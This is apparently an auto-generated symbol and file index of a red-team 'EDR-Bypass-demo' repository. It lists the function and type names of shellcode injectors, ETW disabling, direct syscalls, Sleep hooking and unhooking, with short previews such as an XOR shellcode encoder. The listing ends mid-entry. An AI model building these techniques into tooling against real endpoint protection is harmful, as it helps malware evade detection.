type SW3_SYSCALL_LIST (line 49) | typedef struct _SW3_SYSCALL_LIST
type SW3_PEB_LDR_DATA (line 55) | typedef struct _SW3_PEB_LDR_DATA {
type SW3_LDR_DATA_TABLE_ENTRY (line 61) | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
type SW3_PEB (line 68) | typedef struct _SW3_PEB {
type UNICODE_STRING (line 81) | typedef struct _UNICODE_STRING
type SYSTEM_HANDLE (line 88) | typedef struct _SYSTEM_HANDLE
type TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE (line 98) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
type TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE (line 104) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
type WNF_TYPE_ID (line 110) | typedef struct _WNF_TYPE_ID
type PS_CREATE_STATE (line 115) | typedef enum _PS_CREATE_STATE
type KCONTINUE_TYPE (line 127) | typedef enum _KCONTINUE_TYPE
type IO_STATUS_BLOCK (line 136) | typedef struct _IO_STATUS_BLOCK
type SYSTEM_HANDLE_INFORMATION (line 146) | typedef struct _SYSTEM_HANDLE_INFORMATION
type CLIENT_ID (line 152) | typedef struct _CLIENT_ID
type PLUGPLAY_EVENT_CATEGORY (line 158) | typedef enum _PLUGPLAY_EVENT_CATEGORY
type PNP_VETO_TYPE (line 173) | typedef enum _PNP_VETO_TYPE
type TOKEN_SECURITY_ATTRIBUTE_V1 (line 190) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
type VOID (line 207) | typedef VOID(KNORMAL_ROUTINE) (
type PS_ATTRIBUTE (line 212) | typedef struct _PS_ATTRIBUTE
type WNF_STATE_NAME (line 224) | typedef struct _WNF_STATE_NAME
type KEY_VALUE_ENTRY (line 240) | typedef struct _KEY_VALUE_ENTRY
type KEY_SET_INFORMATION_CLASS (line 248) | typedef enum _KEY_SET_INFORMATION_CLASS
type SYSTEM_INFORMATION_CLASS (line 259) | typedef enum _SYSTEM_INFORMATION_CLASS
type PROCESSINFOCLASS (line 275) | typedef enum _PROCESSINFOCLASS
type MEMORY_RANGE_ENTRY (line 284) | typedef struct _MEMORY_RANGE_ENTRY
type T2_SET_PARAMETERS (line 290) | typedef struct _T2_SET_PARAMETERS_V0
type FILE_PATH (line 297) | typedef struct _FILE_PATH
type FILE_USER_QUOTA_INFORMATION (line 305) | typedef struct _FILE_USER_QUOTA_INFORMATION
type FILE_QUOTA_LIST_INFORMATION (line 316) | typedef struct _FILE_QUOTA_LIST_INFORMATION
type FILE_NETWORK_OPEN_INFORMATION (line 323) | typedef struct _FILE_NETWORK_OPEN_INFORMATION
type FILTER_BOOT_OPTION_OPERATION (line 335) | typedef enum _FILTER_BOOT_OPTION_OPERATION
type EVENT_TYPE (line 343) | typedef enum _EVENT_TYPE
type FILE_FULL_EA_INFORMATION (line 349) | typedef struct _FILE_FULL_EA_INFORMATION
type FILE_GET_EA_INFORMATION (line 358) | typedef struct _FILE_GET_EA_INFORMATION
type BOOT_OPTIONS (line 365) | typedef struct _BOOT_OPTIONS
type ULONG (line 375) | typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
type WNF_DATA_SCOPE (line 377) | typedef enum _WNF_DATA_SCOPE
type WNF_STATE_NAME_LIFETIME (line 386) | typedef enum _WNF_STATE_NAME_LIFETIME
type VIRTUAL_MEMORY_INFORMATION_CLASS (line 394) | typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS
type IO_SESSION_EVENT (line 401) | typedef enum _IO_SESSION_EVENT
type PORT_INFORMATION_CLASS (line 413) | typedef enum _PORT_INFORMATION_CLASS
type PLUGPLAY_CONTROL_CLASS (line 421) | typedef enum _PLUGPLAY_CONTROL_CLASS
type IO_COMPLETION_INFORMATION_CLASS (line 449) | typedef enum _IO_COMPLETION_INFORMATION_CLASS
type SECTION_INHERIT (line 454) | typedef enum _SECTION_INHERIT
type DEBUGOBJECTINFOCLASS (line 460) | typedef enum _DEBUGOBJECTINFOCLASS
type SEMAPHORE_INFORMATION_CLASS (line 466) | typedef enum _SEMAPHORE_INFORMATION_CLASS
type PS_ATTRIBUTE_LIST (line 471) | typedef struct _PS_ATTRIBUTE_LIST
type VDMSERVICECLASS (line 477) | typedef enum _VDMSERVICECLASS
type PS_CREATE_INFO (line 496) | typedef struct _PS_CREATE_INFO
type MEMORY_INFORMATION_CLASS (line 558) | typedef enum _MEMORY_INFORMATION_CLASS
type MEMORY_RESERVE_TYPE (line 573) | typedef enum _MEMORY_RESERVE_TYPE
type ALPC_PORT_INFORMATION_CLASS (line 580) | typedef enum _ALPC_PORT_INFORMATION_CLASS
type ALPC_CONTEXT_ATTR (line 595) | typedef struct _ALPC_CONTEXT_ATTR
type ALPC_DATA_VIEW_ATTR (line 604) | typedef struct _ALPC_DATA_VIEW_ATTR
type ALPC_SECURITY_ATTR (line 612) | typedef struct _ALPC_SECURITY_ATTR
type PVOID (line 621) | typedef PVOID* PPVOID;
type KPROFILE_SOURCE (line 623) | typedef enum _KPROFILE_SOURCE
type ALPC_MESSAGE_INFORMATION_CLASS (line 652) | typedef enum _ALPC_MESSAGE_INFORMATION_CLASS
type WORKERFACTORYINFOCLASS (line 658) | typedef enum _WORKERFACTORYINFOCLASS
type MEMORY_PARTITION_INFORMATION_CLASS (line 674) | typedef enum _MEMORY_PARTITION_INFORMATION_CLASS
type MUTANT_INFORMATION_CLASS (line 685) | typedef enum _MUTANT_INFORMATION_CLASS
type ATOM_INFORMATION_CLASS (line 691) | typedef enum _ATOM_INFORMATION_CLASS
type SHUTDOWN_ACTION (line 697) | typedef enum _SHUTDOWN_ACTION {
type KEY_VALUE_INFORMATION_CLASS (line 708) | typedef enum _KEY_VALUE_INFORMATION_CLASS {
type LANGID (line 717) | typedef LANGID* PLANGID;
type PLUGPLAY_EVENT_BLOCK (line 719) | typedef struct _PLUGPLAY_EVENT_BLOCK
type KNORMAL_ROUTINE (line 778) | typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
type DIRECTORY_NOTIFY_INFORMATION_CLASS (line 780) | typedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
type EVENT_INFORMATION_CLASS (line 786) | typedef enum _EVENT_INFORMATION_CLASS
type ALPC_MESSAGE_ATTRIBUTES (line 791) | typedef struct _ALPC_MESSAGE_ATTRIBUTES
type ALPC_PORT_ATTRIBUTES (line 797) | typedef struct _ALPC_PORT_ATTRIBUTES
type IO_SESSION_STATE (line 813) | typedef enum _IO_SESSION_STATE
type WNF_STATE_NAME (line 826) | typedef const WNF_STATE_NAME* PCWNF_STATE_NAME;
type WNF_TYPE_ID (line 828) | typedef const WNF_TYPE_ID* PCWNF_TYPE_ID;
type WNF_DELIVERY_DESCRIPTOR (line 830) | typedef struct _WNF_DELIVERY_DESCRIPTOR
type DEBUG_CONTROL_CODE (line 841) | typedef enum _DEBUG_CONTROL_CODE
type PORT_MESSAGE (line 877) | typedef struct _PORT_MESSAGE
type FILE_BASIC_INFORMATION (line 920) | typedef struct FILE_BASIC_INFORMATION
type PORT_SECTION_READ (line 929) | typedef struct _PORT_SECTION_READ
type PORT_SECTION_WRITE (line 936) | typedef struct _PORT_SECTION_WRITE
type TIMER_TYPE (line 946) | typedef enum _TIMER_TYPE
type BOOT_ENTRY (line 952) | typedef struct _BOOT_ENTRY
type EFI_DRIVER_ENTRY (line 964) | typedef struct _EFI_DRIVER_ENTRY
type USHORT (line 974) | typedef USHORT RTL_ATOM, * PRTL_ATOM;
type TIMER_SET_INFORMATION_CLASS (line 976) | typedef enum _TIMER_SET_INFORMATION_CLASS
type FSINFOCLASS (line 982) | typedef enum _FSINFOCLASS
type WAIT_TYPE (line 1001) | typedef enum _WAIT_TYPE
type USER_STACK (line 1007) | typedef struct _USER_STACK
type SECTION_INFORMATION_CLASS (line 1016) | typedef enum _SECTION_INFORMATION_CLASS
type APPHELPCACHESERVICECLASS (line 1022) | typedef enum _APPHELPCACHESERVICECLASS
type TOKEN_SECURITY_ATTRIBUTES_INFORMATION (line 1033) | typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
type FILE_IO_COMPLETION_INFORMATION (line 1044) | typedef struct _FILE_IO_COMPLETION_INFORMATION
type PVOID (line 1051) | typedef PVOID PT2_CANCEL_PARAMETERS;
type THREADINFOCLASS (line 1053) | typedef enum _THREADINFOCLASS
type OBJECT_INFORMATION_CLASS (line 1077) | typedef enum _OBJECT_INFORMATION_CLASS
type FILE_INFORMATION_CLASS (line 1086) | typedef enum _FILE_INFORMATION_CLASS
type KEY_INFORMATION_CLASS (line 1157) | typedef enum _KEY_INFORMATION_CLASS
type OBJECT_ATTRIBUTES (line 1170) | typedef struct _OBJECT_ATTRIBUTES
type TIMER_INFORMATION_CLASS (line 1180) | typedef enum _TIMER_INFORMATION_CLASS
type KCONTINUE_ARGUMENT (line 1185) | typedef struct _KCONTINUE_ARGUMENT
FILE: chapter4-demo4/ShellcodeFluctuation/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo4/ShellcodeFluctuation/base64.h
function XOR_KEY (line 6) | const int XOR_KEY{ 8 }
FILE: chapter4-demo4/ShellcodeFluctuation/header.h
type std (line 19) | typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::C...
type TypeOfFluctuation (line 21) | enum TypeOfFluctuation
type FluctuationMetadata (line 28) | struct FluctuationMetadata
type HookedSleep (line 37) | struct HookedSleep
type HookTrampolineBuffers (line 43) | struct HookTrampolineBuffers
FILE: chapter4-demo4/ShellcodeFluctuation/main.cpp
function MySleep (line 12) | void WINAPI MySleep(DWORD dwMilliseconds)
function collectMemoryMap (line 68) | std::vector<MEMORY_BASIC_INFORMATION> collectMemoryMap(HANDLE hProcess, ...
function initializeShellcodeFluctuation (line 95) | void initializeShellcodeFluctuation(const LPVOID caller)
function xor32 (line 141) | void xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey)
function isShellcodeThread (line 157) | bool isShellcodeThread(LPVOID address)
function fastTrampoline (line 179) | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAd...
function hookSleep (line 265) | bool hookSleep()
function shellcodeEncryptDecrypt (line 279) | void shellcodeEncryptDecrypt(LPVOID callerAddress)
function LONG (line 345) | LONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo)
function readShellcode (line 386) | bool readShellcode(const char* path, std::vector<uint8_t>& shellcode)
function runShellcode (line 410) | void runShellcode(LPVOID param)
function injectShellcode (line 422) | bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
function replace (line 484) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function main (line 511) | int main(int argc, char** argv)
FILE: demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp
function disableETW (line 11) | void disableETW(void) {
function main (line 46) | int main()
FILE: demo2/shellcode_execut3/shellcode_execut3/Program.cs
class Program (line 17) | static class Program
method SubArray (line 19) | private static T[] SubArray<T>(this T[] data, int index, int length)
method xor (line 26) | private static byte[] xor(byte[] cipher, byte[] key)
method Main (line 39) | static void Main()
method VirtualAlloc (line 95) | [DllImport("kernel32")]
method CreateThread (line 103) | [DllImport("kernel32")]
method WaitForSingleObject (line 113) | [DllImport("kernel32")]
FILE: demo3/SharpInjector-master/ScEncryptor/Program.cs
class Program (line 12) | class Program
method Main (line 14) | static void Main(string[] args)
method Enc (line 31) | public static string Enc(string data)
method WriteShellcodeToFile (line 70) | public static void WriteShellcodeToFile(string EncryptedShellcode)
FILE: demo3/SharpInjector-master/SharpInjector/CreateFiber.cs
class CreateFiber (line 14) | class CreateFiber
method ExecuteCreateFiber (line 16) | public static void ExecuteCreateFiber(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs
class CreateRemoteThread (line 12) | class CreateRemoteThread
method ExecuteCreateRemoteThread (line 14) | public static void ExecuteCreateRemoteThread(string ParentName, string...
FILE: demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs
class CreateRemoteThreadEx (line 12) | class CreateRemoteThreadEx
method ExecuteCreateRemoteThreadEx (line 14) | public static void ExecuteCreateRemoteThreadEx(string ParentName, stri...
FILE: demo3/SharpInjector-master/SharpInjector/CreateThread.cs
class CreateThread (line 10) | class CreateThread
method ExecuteCreateThread (line 12) | public static void ExecuteCreateThread(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs
class EtwpCreateEtwThread (line 14) | class EtwpCreateEtwThread
method ExecuteEtwpCreateEtwThread (line 18) | public static void ExecuteEtwpCreateEtwThread(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/Program.cs
class Program (line 17) | class Program
method xor (line 19) | private static byte[] xor(byte[] cipher, byte[] key)
method Main (line 30) | static void Main(string[] args)
method VirtualAlloc (line 81) | [DllImport("kernel32")]
method CreateThread (line 89) | [DllImport("kernel32")]
method WaitForSingleObject (line 99) | [DllImport("kernel32")]
method Dec (line 106) | public static string Dec(string ciphertext)
type ExecutionMethod (line 134) | public enum ExecutionMethod
FILE: demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs
class Resource1 (line 22) | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resource...
method Resource1 (line 31) | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Mic...
FILE: demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs
class QueueUserAPC (line 12) | class QueueUserAPC
method ExecuteQueueUserAPC (line 14) | public static void ExecuteQueueUserAPC(string ParentName, string Progr...
FILE: demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs
class RtlCreateUserThread (line 13) | class RtlCreateUserThread
method ExecuteRtlCreateUserThread (line 15) | public static void ExecuteRtlCreateUserThread(string ParentName, strin...
FILE: demo3/SharpInjector-master/SharpInjector/Shellycode.cs
class EncryptedShellcode (line 3) | class EncryptedShellcode
FILE: demo3/SharpInjector-master/SharpInjector/WinAPI.cs
class WinAPI (line 10) | class WinAPI
type PROCESS_INFORMATION (line 19) | public struct PROCESS_INFORMATION
type SECURITY_ATTRIBUTES (line 27) | public struct SECURITY_ATTRIBUTES
type STARTUPINFO (line 35) | public struct STARTUPINFO
type STARTUPINFOEX (line 57) | public struct STARTUPINFOEX
type StartupInfoFlags (line 63) | public enum StartupInfoFlags : uint
type ProcessCreationFlags (line 69) | public enum ProcessCreationFlags : uint
type ProcessAccessFlags (line 76) | public enum ProcessAccessFlags : uint
type FreeType (line 82) | public enum FreeType : uint
type ThreadAccess (line 88) | public enum ThreadAccess : int
method CloseHandle (line 93) | [DllImport("kernel32.dll")]
method ConvertThreadToFiber (line 98) | [DllImport("kernel32.dll")]
method CreateFiber (line 102) | [DllImport("kernel32.dll")]
method CreateProcess (line 108) | [DllImport("kernel32.dll")]
method CreateThread (line 121) | [DllImport("kernel32.dll")]
method CreateRemoteThread (line 130) | [DllImport("kernel32.dll")]
method CreateRemoteThreadEx (line 140) | [DllImport("kernel32.dll")]
method EtwpCreateEtwThread (line 151) | [DllImport("ntdll.dll")]
method InitializeProcThreadAttributeList (line 156) | [DllImport("kernel32.dll")]
method OpenProcess (line 163) | [DllImport("kernel32.dll")]
method OpenThread (line 169) | [DllImport("kernel32.dll")]
method QueueUserAPC (line 175) | [DllImport("kernel32.dll")]
method ResumeThread (line 182) | [DllImport("kernel32.dll")]
method RtlCopyMemory (line 186) | [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory")]
method RtlCreateUserThread (line 192) | [DllImport("ntdll.dll")]
method SwitchToFiber (line 206) | [DllImport("kernel32.dll")]
method TerminateProcess (line 210) | [DllImport("kernel32.dll")]
method UpdateProcThreadAttribute (line 215) | [DllImport("kernel32.dll")]
method VirtualAlloc (line 225) | [DllImport("kernel32.dll")]
method VirtualAllocEx (line 232) | [DllImport("kernel32.dll")]
method VirtualFree (line 240) | [DllImport("kernel32.dll")]
method VirtualFreeEx (line 246) | [DllImport("kernel32.dll")]
method VirtualProtect (line 253) | [DllImport("kernel32.dll")]
method VirtualProtectEx (line 260) | [DllImport("kernel32.dll")]
method WaitForSingleObject (line 268) | [DllImport("kernel32.dll")]
method WriteProcessMemory (line 273) | [DllImport("kernel32.dll")]
method Clean (line 281) | public static void Clean(IntPtr hprocess, IntPtr address, int length)
FILE: demo4/syscall/syscall/syscall_call.cpp
function main (line 18) | int main()
FILE: demo5/syscall3/syscall3/1.cpp
function EXTERN_C (line 10) | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
function BOOL (line 14) | __declspec(naked) BOOL local_is_wow64(void)
function DWORD (line 42) | DWORD SW3_HashSyscall(PCSTR FunctionName)
function PVOID (line 57) | PVOID SC_Address(PVOID NtApiAddress)
function PVOID (line 62) | PVOID SC_Address(PVOID NtApiAddress)
function BOOL (line 142) | BOOL SW3_PopulateSyscallList()
function EXTERN_C (line 234) | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
function EXTERN_C (line 250) | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
function EXTERN_C (line 266) | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
FILE: demo5/syscall3/syscall3/1.h
type SW3_SYSCALL_ENTRY (line 20) | typedef struct _SW3_SYSCALL_ENTRY
type SW3_SYSCALL_LIST (line 27) | typedef struct _SW3_SYSCALL_LIST
type SW3_PEB_LDR_DATA (line 33) | typedef struct _SW3_PEB_LDR_DATA {
type SW3_LDR_DATA_TABLE_ENTRY (line 39) | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
type SW3_PEB (line 46) | typedef struct _SW3_PEB {
type SYSTEM_HANDLE (line 59) | typedef struct _SYSTEM_HANDLE
type IO_STATUS_BLOCK (line 69) | typedef struct _IO_STATUS_BLOCK
type SYSTEM_HANDLE_INFORMATION (line 79) | typedef struct _SYSTEM_HANDLE_INFORMATION
type VOID (line 85) | typedef VOID(KNORMAL_ROUTINE) (
type PS_ATTRIBUTE (line 90) | typedef struct _PS_ATTRIBUTE
type UNICODE_STRING (line 102) | typedef struct _UNICODE_STRING
type OBJECT_ATTRIBUTES (line 120) | typedef struct _OBJECT_ATTRIBUTES
type CLIENT_ID (line 130) | typedef struct _CLIENT_ID
type SYSTEM_INFORMATION_CLASS (line 136) | typedef enum _SYSTEM_INFORMATION_CLASS
type PROCESSINFOCLASS (line 152) | typedef enum _PROCESSINFOCLASS
type WAIT_TYPE (line 161) | typedef enum _WAIT_TYPE
type KNORMAL_ROUTINE (line 172) | typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
type THREADINFOCLASS (line 174) | typedef enum _THREADINFOCLASS
type SECTION_INHERIT (line 198) | typedef enum _SECTION_INHERIT
type FILE_INFORMATION_CLASS (line 204) | typedef enum _FILE_INFORMATION_CLASS
type PS_ATTRIBUTE_LIST (line 275) | typedef struct _PS_ATTRIBUTE_LIST
FILE: demo5/syscall3/syscall3/syscall3.cpp
function main (line 4) | int main()
FILE: demo6/unhook_demo/Header.h
type std (line 18) | typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::C...
type HookedSleep (line 20) | struct HookedSleep
type HookTrampolineBuffers (line 26) | struct HookTrampolineBuffers
FILE: demo6/unhook_demo/unhook_demo.cpp
function MySleep (line 12) | void WINAPI MySleep(DWORD dwMilliseconds)
function fastTrampoline (line 23) | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAd...
function hookSleep (line 111) | bool hookSleep()
function main (line 125) | int main()
[
{
"path": "README.md",
"chars": 950,
"preview": "# EDR-Bypass-demo\nSome demos to bypass EDRs or AVs by 78itsT3@m\n\n## 本文为7bits系列文章《红队队开发基础-基础免杀》的示例代码\n\n### 欢迎关注我们的公众号 - Zb"
},
{
"path": "chapter4-demo1/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo1/demo1/Header.h",
"chars": 39,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };"
},
{
"path": "chapter4-demo1/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo1/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo1/demo1/demo1.cpp",
"chars": 4147,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj",
"chars": 7736,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj.filters",
"chars": 1297,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe",
"chars": 289,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.log",
"chars": 398,
"preview": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 158,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.exe.recipe",
"chars": 291,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.log",
"chars": 568,
"preview": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 160,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo1/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo1/enc.py",
"chars": 199,
"preview": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^"
},
{
"path": "chapter4-demo2/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo2/demo1/Header.h",
"chars": 734,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include <vector>\r\n\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000"
},
{
"path": "chapter4-demo2/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo2/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo2/demo1/demo1.cpp",
"chars": 7584,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj",
"chars": 7998,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj.filters",
"chars": 1509,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo2/demo1/nt.asm",
"chars": 474,
"preview": ".code\r\n\r\n\r\nbye :\r\nret\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r"
},
{
"path": "chapter4-demo2/demo1/nt.h",
"chars": 549,
"preview": "#pragma once\r\n#include <Windows.h>\r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPV"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe",
"chars": 274,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.log",
"chars": 55,
"preview": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 143,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.exe.recipe",
"chars": 276,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.log",
"chars": 1283,
"preview": " demo1.cpp\r\nE:\\last\\demo1\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo1\\"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 145,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo2/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo2/enc.py",
"chars": 199,
"preview": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^"
},
{
"path": "chapter4-demo3/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
